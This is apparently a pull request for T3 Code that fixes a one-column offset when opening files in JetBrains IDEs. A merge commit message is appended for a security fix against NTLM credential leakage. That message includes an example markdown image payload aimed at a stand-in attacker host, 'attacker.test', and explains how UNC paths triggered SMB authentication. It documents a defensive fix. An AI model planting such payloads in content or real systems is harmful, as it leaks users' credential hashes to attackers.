Problem

JetBrains IDEs read --column as zero-based, while T3 Code file targets use one-based columns. A link to main.ts:12:4 launched idea --line 12 --column 4 main.ts, which puts the caret at line 12, column 5.

The IntelliJ Platform converts only the line: navigateToFileFromCommandLine builds OpenFileDescriptor(project, file, line - 1, column.coerceAtLeast(0)), and OpenFileDescriptor counts both from 0. JetBrains' own test line and column reach the opened editor passes --line 2 --column 3 and expects LogicalPosition(1, 3). The status bar shows that position one-based, as 2:4.

Change

The line-column launch style now passes the column minus one (never below 0). Lines and targets without a column are unchanged.

Scope

This is a very small, focused fix for an obvious bug: every JetBrains IDE in Open in lands one column off. It changes one argument in resolveCommandEditorArgs and the test expectations that pinned the old value. It does not touch which project the file opens in; that is #5885.

I first found and fixed this in #22289, then split it out so it can land on its own.

Verification

  • vp test run src/process/externalLauncher.test.ts in apps/server: 18 passed and 2 failed. The failures, keeps the macOS VS Code Insiders bundle out of stable VS Code and does not report the agy CLI as the Antigravity IDE on darwin, read this Mac's real /Applications and fail the same way on main. The JetBrains cases on macOS, Windows, and Linux now expect --column 3 for file.ts:12:4.

  • Lint and format on the changed files: clean.

  • Manual check in Android Studio 2026.1 on macOS, with a project open and abcdefghijklmnopqrstuvwxyz on line 12. I ran the bundled CLI that Open in spawns, Contents/MacOS/studio --line 12 --column N src/main.ts, three times in a row with no keyboard input, and read the status bar after each run:

    --column Status bar
    0 12:1
    3 12:4
    4 (what main passes for main.ts:12:4) 12:5
  • Not checked: other JetBrains IDEs. They share the IntelliJ Platform command-line handling linked above.

JetBrains IDEs read `--column` as zero-based, so `file.ts:12:4` put the caret one column to the right. Pass the column minus one.

Approvability

Verdict: Approved at 04ba05e

Macroscope's review found this PR approvable — This is a narrowly scoped server bug fix that adjusts JetBrains IDE column arguments from one-based to zero-based while preserving all other launch behavior. Cross-platform launcher expectations were updated, with no product-default or static-analysis configuration changes.

📝 Walkthrough

JetBrains editor launches now convert supplied columns from 1-based to 0-based values and clamp the result at zero. Updated platform-specific tests expect column 3.

Explanation

The description covers the problem, change, scope justification, verification results, known test limitations, and manual validation. The focused-fix exemption explains why prior approval was not required. The agent attribution names Claude Opus 5.5 but does not identify a harness; this is a minor omission and does not prevent review.

* Merge commit from fork

A markdown image such as ![x](file://attacker.test/share/cat.jpg), or a raw
\\host\share path, was classified as a host file. Rendering it asked the
server for a signed asset URL, and the server's realpath on the resulting UNC
path made Windows open an SMB session and send the user's NetNTLMv2 response
to the attacker's host, with no click and no tool call. File-link chips did
the same through filesystem.getMetadata, which stats every absolute path, and
storage cleanup stats the store paths in a worktree's pnpm manifest, which an
agent can write.

Network paths (two leading separators, as Windows reads them: \\h, //h, /\h)
now only resolve inside the thread's project, so projects on a share keep
working:

- clients block them in markdown images and stop treating them as file links
- the web stops asking for their metadata
- the server refuses them for media assets and file reads outside the
project, never stats one for metadata, and storage cleanup ignores a pnpm
  manifest that names one
- each check hands the filesystem the resolved path it approved, since
Windows reads a `\\?\` path as written, `..` included
